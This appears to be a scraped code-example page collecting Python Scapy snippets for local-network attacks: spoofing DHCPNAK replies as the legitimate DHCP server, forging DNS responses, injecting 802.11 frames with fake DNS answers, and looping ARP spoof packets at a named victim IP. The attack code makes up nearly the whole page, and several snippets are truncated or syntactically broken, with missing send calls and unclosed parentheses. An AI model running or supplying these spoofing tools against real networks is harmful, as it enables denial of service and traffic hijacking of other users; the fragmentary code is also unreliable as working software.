Ejemplo n.º 1
def nak_request(pkt):
    msg("Spoofing DHCPNAK from " + globals()['dhcp_server_mac'], 2)
        Ether(src=globals()['dhcp_server_mac'], dst=pkt[Ether].dst) /
        IP(src=globals()['dhcp_server_ip'], dst=pkt[IP].dst) /
        UDP(sport=67, dport=68) / BOOTP(op=2,
                                        xid=pkt[BOOTP].xid) /
        DHCP(options=[('server_id', globals()['dhcp_server_ip']),
                      ('message-type', 'nak'), ('end')]))
Ejemplo n.º 2
def procPacket(p):
    #Lets grab the source mac and dst mac
    eth_layer = p.getlayer(scapy.Ether)
    src_mac = eth_layer.src
    dst_mac = eth_layer.dst

    #Now on to grabbing the src IP and dst IP
    ip_layer = p.getlayer(scapy.IP)
    src_ip = ip_layer.src
    dst_ip = ip_layer.dst

    #Woot..UDP Layer
    udp_layer = p.getlayer(scapy.UDP)
    src_port = udp_layer.sport
    dst_port = udp_layer.dport

    #And finally..the DNS layer
    dns_layer = p.getlayer(scapy.DNS)
    d = scapy.DNS()
    d.id = dns_layer.id  #Transaction ID
    d.qr = 1  #1 for Response
    d.opcode = 16
    d.aa = 0
    d.tc = 0
    d.rd = 0
    d.ra = 1
    d.z = 8
    d.rcode = 0
    d.qdcount = 1  #Question Count
    d.ancount = 1  #Answer Count
    d.nscount = 0  #No Name server info
    d.arcount = 0  #No additional records
    d.qd = str(dns_layer.qd)
    d.an = scapy.DNSRR(rrname="www.google.com.",

    #Send the spoofed packet away!
    #Don't forget to switch stuffs lawl
    spoofed = scapy.Ether(src=dst_mac, dst=src_mac) / scapy.IP(
        src=dst_ip, dst=src_ip) / scapy.UDP(sport=dst_port, dport=src_port) / d

    #Off we go!
    scapy.sendp(spoofed, iface_hint=src_ip)
Ejemplo n.º 3
def procPacket(p):
	#Lets grab the source mac and dst mac
        eth_layer = p.getlayer(scapy.Ether)
        src_mac = eth_layer.src
        dst_mac = eth_layer.dst

	#Now on to grabbing the src IP and dst IP
        ip_layer = p.getlayer(scapy.IP)
        src_ip = ip_layer.src
        dst_ip = ip_layer.dst

	#Woot..UDP Layer
	udp_layer = p.getlayer(scapy.UDP)
	src_port = udp_layer.sport
	dst_port = udp_layer.dport

	#And finally..the DNS layer
        dns_layer = p.getlayer(scapy.DNS)
	d = scapy.DNS()
	d.id = dns_layer.id	#Transaction ID
	d.qr = 1		#1 for Response
	d.opcode = 16	
	d.aa = 0		
	d.tc = 0		
	d.rd = 0
	d.ra = 1
	d.z = 8
	d.rcode = 0
	d.qdcount = 1		#Question Count
	d.ancount = 1		#Answer Count
	d.nscount = 0		#No Name server info
	d.arcount = 0		#No additional records
	d.qd = str(dns_layer.qd)
	d.an = scapy.DNSRR(rrname="www.google.com.", ttl=330, type="A", rclass="IN", rdata="")

	#Send the spoofed packet away!
	#Don't forget to switch stuffs lawl
	spoofed = scapy.Ether(src=dst_mac, dst=src_mac)/scapy.IP(src=dst_ip, dst=src_ip)/scapy.UDP(sport=dst_port, dport=src_port)/d

	#Off we go!
	scapy.sendp(spoofed, iface_hint=src_ip)
Ejemplo n.º 4
		dst = dot11_frame.getlayer(IP).src,
		ttl = TTL)
	    dot11_answer /= UDP(
		sport = dot11_frame.getlayer(UDP).dport,
		dport = dot11_frame.getlayer(UDP).sport)
	    dot11_answer /= DNS(
		id = dot11_frame.getlayer(DNS).id,
		qr = 1,
		qd = dot11_frame.getlayer(DNS).qd,
		an = DNSRR(
		    rrname = dot11_frame.getlayer(DNS).qd.qname,
		    ttl = 10,
		    rdata = IPDNS)

	    if DEBUG:
		os.write(1,"Sending DNS Reply on %s\n" % OUT_IFACE)
		if VERB:
		    os.write(1,"%s\n" % dot11_frame.summary())

	# Frame injection :
		sendp(dot11_answer,verbose=0) # Send frame

# Program killed
except KeyboardInterrupt:
    print "Stopped by user."


                dot11_answer.addr3 = SMAC
            if WEP:
                dot11_answer.FCfield |= 0x40
                dot11_answer /= Dot11WEP(iv="111", keyid=KEYID)
            dot11_answer /= (
                LLC(ctrl=3) / SNAP() / IP(src=dot11_frame.getlayer(IP).dst, dst=dot11_frame.getlayer(IP).src, ttl=TTL)
            dot11_answer /= UDP(sport=dot11_frame.getlayer(UDP).dport, dport=dot11_frame.getlayer(UDP).sport)
            dot11_answer /= DNS(
                an=DNSRR(rrname=dot11_frame.getlayer(DNS).qd.qname, ttl=10, rdata=IPDNS),

            if DEBUG:
                os.write(1, "Sending DNS Reply on %s\n" % OUT_IFACE)
                if VERB:
                    os.write(1, "%s\n" % dot11_frame.summary())

                # Frame injection :
                sendp(dot11_answer, verbose=0)  # Send frame

# Program killed
except KeyboardInterrupt:
    print "Stopped by user."


Ejemplo n.º 6
# This array holds the MAC address from DHCP clients which have send a DHCPREQUEST. We use it to
# cross reference it with ARP packets to see from which DHCP server a lease was obtained.
macs = {}

def msg(string, level):
    if globals()['verbose'] >= level:

# Sending a DHCPDISCOVER to aquire the DHCP server IP.
msg("Sending DHCPDISCOVER packet to discover DHCP servers", 2)
    Ether(src="00:00:00:00:00:00", dst="ff:ff:ff:ff:ff:ff") /
    IP(src="", dst="") / UDP(sport=68, dport=67) /
    BOOTP(chaddr="\x00\x00\x00\x00\x00\x00", xid=0x10000000) /
    DHCP(options=[('message-type', 'discover'), ('end')]))

# Filtering out the DHCP server it's IP address, and storing it in a global variable. We ignore our
# own DHCP server via a bpf filter in the sniff command below.
def get_dhcp_server(pkt):
    if pkt[DHCP] and pkt[DHCP].options[0][1] == 2:
        globals()["dhcp_server_ip"] = pkt[IP].src
        globals()["dhcp_server_mac"] = pkt[Ether].src
        msg("Legit DHCP server found on " + globals()['dhcp_server_ip'], 1)

# Detecting DHCPREQUEST packets and ARP packets.
def detect_dhcp_request(pkt):
Ejemplo n.º 7
def nak_request(pkt):
    msg("Spoofing DHCPNAK from " + globals()['dhcp_server_mac'],2)
    sendp(Ether(src=globals()['dhcp_server_mac'], dst=pkt[Ether].dst)/
    BOOTP(op=2, ciaddr=pkt[IP].src,siaddr=pkt[IP].dst,chaddr=pkt[Ether].src, xid=pkt[BOOTP].xid)/
    DHCP(options=[('server_id',globals()['dhcp_server_ip']),('message-type','nak'), ('end')]))
Ejemplo n.º 8
# This array will hold the MAC from a DHCP client, and the number of times we have tried to spoof 
# a DHCPNAK from the legit DHCP server.
attempted_dhcpnaks = {}

# This array holds the MAC address from DHCP clients which have send a DHCPREQUEST. We use it to
# cross reference it with ARP packets to see from which DHCP server a lease was obtained.
macs = {}

def msg(string, level):
    if globals()['verbose'] >= level:

# Sending a DHCPDISCOVER to aquire the DHCP server IP.
msg("Sending DHCPDISCOVER packet to discover DHCP servers",2)

# Filtering out the DHCP server it's IP address, and storing it in a global variable. We ignore our 
# own DHCP server via a bpf filter in the sniff command below. 
def get_dhcp_server(pkt):
    if pkt[DHCP] and pkt[DHCP].options[0][1] == 2:
        globals()["dhcp_server_ip"] = pkt[IP].src
        globals()["dhcp_server_mac"] = pkt[Ether].src
        msg("Legit DHCP server found on " + globals()['dhcp_server_ip'],1)

# Detecting DHCPREQUEST packets and ARP packets.
def detect_dhcp_request(pkt):
    if pkt[DHCP] and pkt[DHCP].options[0][1] == 3:
        msg("DHCPREQUEST detected from " + pkt[Ether].src,2)
        globals()['macs'][pkt[Ether].src] = pkt[Ether].src 
Ejemplo n.º 9
import scapy,sys

if not len(sys.argv) == 2:
	print "Must supply IP"

victim = sys.argv[1]
network = victim[:victim.rfind(".")+1] + "%d"

tmac = scapy.getmacbyip(victim)

for i in range(255):
	target = str(network % i)
	if target == victim:

	p = scapy.Ether(dst=tmac)/scapy.ARP(op="who-has", psrc=target, pdst=victim)

	scapy.sendp(p, iface_hint=target)
Ejemplo n.º 10
		dot11_sent_frame.addr3 = SMAC
	    if WEP:
		dot11_sent_frame.FCfield |= 0x40
		dot11_sent_frame /= Dot11WEP(
		    iv = "111",
		    keyid = KEYID)
	    dot11_sent_frame /= LLC(ctrl = 3)/SNAP(code=eth_rcvd_frame.getlayer(Ether).type)/eth_rcvd_frame.getlayer(Ether).payload

	    if DEBUG:
	        os.write(1,"Sending from-DS to %s\n" % OUT_IFACE)
		if VERB:
		    os.write(1,"%s\n" % dot11_sent_frame.summary())
	# Frame injection :
	    sendp(dot11_sent_frame,verbose=0) # Send from-DS frame

	# Frame from WiFi network
	if s in r:

	    # 802.11 maximum frame size is 2346 bytes (cf. RFC3580)
	    # However, WiFi interfaces are always MTUed to 1500
	    dot11_rcvd_frame = s.recv(2346)

	# WEP handling is automagicly done by Scapy if conf.wepkey is set
	# Nothing to do to decrypt (although not yet tested)
	# WEP frames have Dot11WEP layer, others don't

	    if DEBUG:
		if dot11_rcvd_frame.haslayer(Dot11WEP): # WEP frame
		    os.write(1,"Received WEP from %s\n" % IN_IFACE)